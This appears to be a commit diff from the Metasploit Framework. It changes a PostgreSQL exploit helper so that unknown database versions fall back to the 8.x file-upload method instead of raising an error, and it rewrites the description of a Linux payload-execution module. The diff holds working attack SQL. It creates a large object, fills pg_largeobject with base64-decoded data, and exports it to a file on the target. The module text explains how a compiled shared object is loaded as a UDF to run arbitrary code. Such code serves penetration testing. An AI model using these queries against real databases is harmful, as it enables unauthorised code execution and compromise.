Go back to old behavior for unknown versions
May not be correct, but it's what we used to do, so probably better than just raising. Also documents things a bit better.bug/bundler_fix
James Lee
parent
1eccb24bf8
commit
768d2c5921
|
|
@ -325,20 +325,20 @@ module Exploit::Remote::Postgres
|
|||
end
|
||||
|
||||
# Writes b64 data from a table field, decoded, to disk.
|
||||
#
|
||||
# This is accomplished with 3 sql queries:
|
||||
# 1. select lo_create
|
||||
# 2. version dependant:
|
||||
# - on 9.x, insert into pg_largeobject
|
||||
# - on older versions, update pg_largeobject
|
||||
# 3. select lo_export to write the file to disk
|
||||
#
|
||||
def postgres_write_data_to_disk(tbl,fld,remote_fname=nil)
|
||||
oid = rand(60000) + 1000
|
||||
remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"
|
||||
|
||||
ver = postgres_fingerprint
|
||||
case ver[:auth]
|
||||
when /PostgreSQL 8\./
|
||||
# 8.x inserts the largeobject into the table when you do the
|
||||
# lo_create, so we with a value.
|
||||
queries = [
|
||||
"select lo_create(#{oid})",
|
||||
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
|
||||
"select lo_export(#{oid}, '#{remote_fname}')"
|
||||
]
|
||||
when /PostgreSQL 9\./
|
||||
# 9.x does *not* insert the largeobject into the table when you do
|
||||
# the lo_create, so we must insert it ourselves.
|
||||
|
|
@ -348,10 +348,17 @@ module Exploit::Remote::Postgres
|
|||
"select lo_export(#{oid}, '#{remote_fname}')"
|
||||
]
|
||||
else
|
||||
# Since the technique required for uploading seems to change
|
||||
# between versions, complain that we don't know how to do it for
|
||||
# an unknown version.
|
||||
raise RuntimeError.new("Unknown Postgres version, don't know how to upload files")
|
||||
# 8.x inserts the largeobject into the table when you do the
|
||||
# lo_create, so we with a value.
|
||||
#
|
||||
# 7.x is an unknown, but this behavior was the default before the
|
||||
# addition of support for 9.x above, so try it this way and hope
|
||||
# for the best
|
||||
queries = [
|
||||
"select lo_create(#{oid})",
|
||||
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
|
||||
"select lo_export(#{oid}, '#{remote_fname}')"
|
||||
]
|
||||
end
|
||||
|
||||
queries.each do |q|
|
||||
|
|
|
|||
|
|
@ -24,16 +24,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'PostgreSQL for Linux Payload Execution',
|
||||
'Description' => %q{
|
||||
This module creates and enables a custom UDF (user defined function) on the
|
||||
target host via the UPDATE pg_largeobject method of binary injection. On
|
||||
default Microsoft Linux installations of PostgreSQL (=< 8.4), the postgres
|
||||
service account may write to the Windows temp directory, and may source
|
||||
UDF Shared Libraries's from there as well.
|
||||
On some default Linux installations of PostgreSQL, the
|
||||
postgres service account may write to the /tmp directory, and
|
||||
may source UDF Shared Libraries's from there as well, allowing
|
||||
execution of arbitrary code.
|
||||
|
||||
PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on are valid targets for this module.
|
||||
|
||||
NOTE: This module will leave a payload executable on the target system when the
|
||||
attack is finished, as well as the UDF SO and the OID.
|
||||
This module compiles a Linux shared object file, uploads it to
|
||||
the target host via the UPDATE pg_largeobject method of binary
|
||||
injection, and creates a UDF (user defined function) from that
|
||||
shared object. Because the payload is run as the shared object's
|
||||
constructor, it does not need to conform to specific Postgres
|
||||
API versions.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
|||
Loading…
Reference in New Issue